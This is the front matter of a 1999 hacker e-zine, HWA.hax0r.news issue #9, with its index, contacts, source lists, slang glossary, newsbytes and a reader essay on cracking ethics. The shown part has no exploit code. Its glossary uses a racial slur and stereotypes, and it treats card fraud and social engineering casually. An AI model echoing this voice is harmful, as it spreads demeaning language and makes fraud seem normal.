Copy Link
Add to Bookmark
Report
hwa-hn09
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 9 Volume 1 1999 March 13th 99
==========================================================================
Are you running WindowsNT and still under the illusion that it is secure?
``A couple of freelance writers are working on a story for us about
security auditing and protection. As part of their "research," they
decided to see if they could hack into one of our lab networks. It
took them only a few hours to successfully break into our Windows NT
boxes. And from there, they learned the configuration of our lab
networks, the server names and functions, the operating systems we
run and most of the passwords on the key accounts on our Microsoft
Windows NT, Novell NetWare and Unix servers, as well as a good many
of our routers and switches.''
- From NetworkWeek, Story in section 10.0
Synopsis
--------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see.
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #9
=-----------------------------------------------------------------------=
"I'm doing the BEST I can so don't give me any SHIT"
- Seen on a button worn by `Ed'..
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #9 Empirical knowledge is power
=--------------------------------------------------------------------------=
inet.d THIS b1lly the llammah
________ ------- ___________________________________________________________
|\____\_/[ INDEX ]__________________________________________________________/|
| | ||
| | Key Content ||
\|_________________________________________________________________________/
00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0
\__________________________________________________________________________/
01.0 .. Greets
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the editor
02.1 .. Demoniz trashcans his webboard
03.0 .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse
03.1 .. The FPSC-IRCD.txt advisory.
04.0 .. Pentagon under attack (again)
04.1 .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
04.2 .. New Backdoor found: Default passwords in Bay networks switches
04.3 .. ISAPI exploit code
04.4 .. Winfreez.c new exploit code for win9x and NT
04.5 .. Unknown Zone: Windows intra/inter net zone difficulties
04.6 .. Sniffing out MS Security glitch
05.0 .. Linux TCP flaw exploit code for Linux 2.0.35 and older.
(includes Solaris version)
06.0 .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
07.0 .. New Computer Technology Makes Hacking a Snap - Washington Post
08.0 .. Korean "Superhacker" a national resource...
09.0 .. The l0pht and NFR team up to produce top flight IDS
10.0 .. A good example of how 'Secure' NT really is
11.0 .. CON: The Black Hat Briefings Security Conference
12.0 .. CON: CQRE [Secure] Congress and Exhibition
13.0 .. CON: can't afford $2k? check out Canc0n99 security Conference
14.0 .. CON: Countering cyberterrorism
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
H.W .. Hacked Websites
A.0 .. APPENDICES
A.1 .. PHACVW linx and references
____________________________________________________________________________
|\__________________________________________________________________________/|
| | ||
| | ||
\|_________________________________________________________________________|/
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Has it occurred to anybody that "AOL for Dummies" is an extremely
redundant name for a book?
- unknown
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
*News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
News (New site unconfirmed).......http://cnewz98.hypermart.net/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
* Yes demoniz is now officially retired, if you go to that site though the
Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
also be hosting a webboard as soon as that site comes online perhaps you can
visit it and check us out if I can get some decent wwwboard code running I
don't really want to write my own, another alternative being considered is a
telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
BEST-OF-SECURITY Subscription Info.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_/_/_/ _/_/ _/_/_/
_/ _/ _/ _/ _/
_/_/_/ _/ _/ _/_/
_/ _/ _/ _/ _/
_/_/_/ _/_/ _/_/_/
Best Of Security
"echo subscribe|mail best-of-security-request@suburbia.net"
or
"echo subscribe|mail best-of-security-request-d@suburbia.net"
(weekly digest)
For those of you that just don't get the above, try sending a message to
best-of-security-request@suburbia.net with a subject and body of subscribe
and you will get added to the list (maybe, if the admin likes your email).
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
"If all it takes is a million monkeys banging on keyboards then how
come AOL hasn't turned out any Shakespeare yet??" - Anon.
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
Contributors to this issue:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Spikeman .........................: daily news updates+
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"When i'm 21 i'm going to change my name to 'Anonymous' and
claim royalties for all the editorials written and attributed
to my name." - Anonymous
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
wierd crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
Shouts to:
* Kevin Mitnick * demoniz * The l0pht crew
* tattooman * Dicentra * Pyra
* Vexxation * FProphet * TwistedP
* NeMstah * the readers * mj
* Kokey * ypwitch * kimmie
* tsal * spikeman * YOU.
* #leetchans ppl, you know who you are...
* all the people who sent in cool emails and support
* our new 'staff' members.
kewl sites:
+ http://www.freshmeat.net/
+ http://www.slashdot.org/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
+ http://www.legions.org/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ BORED?
You may be interested in this...
http://www.patents.ibm.com/details?patent_number=5501650
if that isn't quite your erh speed, then you can always
check out http://www.hamsterdance.com/ for a laugh
I enjoyed it ...the graphics are most amusing.
++ SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO?
Contributed by FProphet source: Betanews.com
And you thought it was just you. Betanews.com (www.betanews.com)
reports that Microsoft has acknowledged a new bug discovered in
Windows that locksa machine after 49.7 days of consecutive usage.
A fix is available now, and is expected to appear in the forthcoming
Windows 98 service release update, currently expected to be released
in April. Microsoft's Personal Support Center has details.
++ INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE
Mar 11th
Contributed by Ed
Intel released a program that allows the user to turn off the serial
number of their new Pentium III chip, but Zero-Knowledge Systems
claims it has developed an exploit which will retrieve the serial
number wether the feature is turned on or off. I don't have one of
these chips to test this out on so can't confirm or deny this report.
++ BANK PLAN FOES LINE UP
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html
Opponents of "Know Your Customer," a controversial plan by
the government to monitor individuals' banking activities,
will make their case on Capitol Hill. By Declan McCullagh.
++ DELL TO BUY BOATLOAD FROM IBM
http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html
Dell will buy about US$16 billion of chips, drives, and
monitors from IBM during the next seven years. It's a nice
boost to both companies.
++ CANADIAN TELECOM BEHEMOTH BORN
http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html
++ AT&T Canada buys regional phone firm Metronet communications
in US$4.6 billion deal.
++ EUROPEAN TELECOMS: BUY, BUY, BUY
http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html
France's Alcatel agrees to buy another California Internet
company for US$350 million. And Germany's Seimens is
expected to spend $US1.7 billion on US
data-networking firms.
++ IT'S A LINUXWORLD AFTER ALL
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html
This week's conference is turning a tightknit community into
an international phenomenon. Not all of the new industry
stars are ready for the spotlight. Polly Sprenger reports
from San Jose, California.
++ LINUX GETS OPEN-SOURCE GUI
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html
Thanks to an interface lift, Linux is ready to star on the
desktop. GNOME marries components from familiar windowing
environments and adds a few things of its own. Leander
Kahney reports from San Jose, California.
++ NIPPING AT THE HEELS OF MP3
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html
When high tech does battle on the Net, it's not always the
best tech that wins. This is the lesson that a smaller,
faster digital music format is learning in the face of MP3.
By Christopher Jones.
++ TURNING DATA INTO DOLLARS
http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html
PeopleSoft stores information on about 30 million employees
worldwide. Now the company is looking to generate e-business
from its data banks, a plan that's raising eyebrows. By
Joanna Glasner.
++ FROM COMDEX TO VENICE
http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html
The creator of one of the world's biggest computer-trade
shows builds the world's most high-tech hotel. Vince Beiser
reports from Las Vegas.
++ NO TIME FOR PAIN
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html
A new therapy using electric current reduces chronic back
pain, according to a study in the Journal of the American
Medical Association. By Kristen Philipkoski.
++ MONICA'S BIO, BYTE BY BYTE
http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html
Monica's Story, the Lewinsky memoir hitting bookstores on
Thursday, will be the first book published simultaneously in
e-book and paper form. By Steve Silberman.
++ BIG INSIDER SALES AT YAHOO
http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html
Executives sold close to a million shares in February.
Analysts say this could be a red flag. By Jennifer Sullivan.
++ SENATE HEARS Y2K LIABILITY ACT
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html
Two senators introduce the latest legislation to head off a
raft of Year 2000 lawsuits arising from failed computer
systems. By Heidi Kriz.
++ BRITS ON NET: JOLLY GOOD
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html
Ten thousand new Britons log on each day, a new poll reveals.
German newbies nip close at their their heels, but France
has a ways to go.
++ KING FOR THE DOMAINS IN SIGHT
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html
The Internet Corporation for Assigned Names and Numbers
finalizes proposals that will lay down the law on .com -- as
well as .biz, .xxx, and other future top-level domains. By
Chris Oakes.
++ GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html
Older investors looking to retire should stay away from
Internet stocks, the Federal Reserve chairman
tells Congress.
++ CLINTON TABS PRIVACY POINT MAN (POL. Wednesday)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html
An Ohio State law professor will represent the
administration's views concerning online privacy, an issue
which gains a little more momentum every day. By Declan
McCullagh and James Glave.
++ MUSIC INDUSTRY PLANS DVD AUDIO
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html
Record companies and technology companies agree on a
copy-protection framework for the successor to CDs. DVD
Audio is finally ready for consumers. By Christopher Jones.
++ DELL MORPHS INTO A RETAILER
http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html
The world's biggest direct seller of PCs hopes to become a
big online seller of consumer electronics too. Wednesday, it
launched its own online superstore.
++ LINUX, MEET OPERA
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html
Fans of Linux and Opera, which have both built support by
taking on the bigwigs, can now run the underdog browser on
the underdog OS.
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG
~~~~~~~
Lots of mail, not much for sharing here though ... keep the letters coming!
but don't forget to include something I can print too... ;)
. . . . . . .
// Written by NUL (If you don't know, don't ask)
// http://come.to/hexx (UnderConstruction)
// jeanclaude@canada.com
// 99/03/11
#include <If you want to, you can.>
To start this off I would like to make one thing abundantly clear: I do not consider myself
a hacker. I'm more interested in programing than anything else. Sure, I've toiled a bit,
but I cannot be considered as one of the El33t.
The reason for which I am writing this little article is to try to place a bit of clairity
on the reasons for hacking / cracking (or at least trying to make sence of them).
/* */
Hacking, the original motto was to do no damage, but as time went by and people develloped
new skills, they decided that the original motto no longer applied to them. Thus the cracker
was born.
Hacking and Cracking are two different entities. You can not be both at the same time. You
are either one or the other. (For those of you who consider youselves as hackers or crackers
but use other peoples' scirpts to hack/crack, you are neither. Anybody can point and click
their way along or run a programe which does all the work for you, it doesn't require any talent.)
There are a few things that I find pointless in what the cracker community is doing:
First off: What the hell is the point of saying a server's security is shit if you don't
help the server fix it??? What? Hack into it a second time? (I know there are
a few groups out there who actually do help the servers they crack. This part
doesn't concern you.)
Second: Why the hell do people think that they are Eleet when they use a script to
determine what systems are vulnerable? And exploit that vulnerability.
Just because you know one or two tricks doesn't make you anything.
Third: & what the hell is the point of writing in Eleet text? It's all fine and dandy
if you can't spell, but please, half the time you sound like you never got a high
school education!
Power can only corrupt. Crackers who devellope thier skills eventually loose control (though
this isn't true for everybody) they can't help but feel destructive. Though there are different
levels of destructiveness (as I see it):
A: Destroying all information, just for the heck of it.
B: Destributing information / programs to ruin a business.
C: Defacing information.
D: Replacing information, but leaving a back-up copy.
E: Destroying all information, for good purposes.
The last one (E) does fall into the category of cracking because it still is vandalisment of
information even though it's for a good purpose (Cracking the KKK server(s) and destroying
everything would be considered a class E).
Ok, ok I know... This did kindof turn out to be a bit differently then what it was supposed
to be, but still I think I did manage to get a small message accross...
// EOF
Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and
tattooman among others ..
@HWA
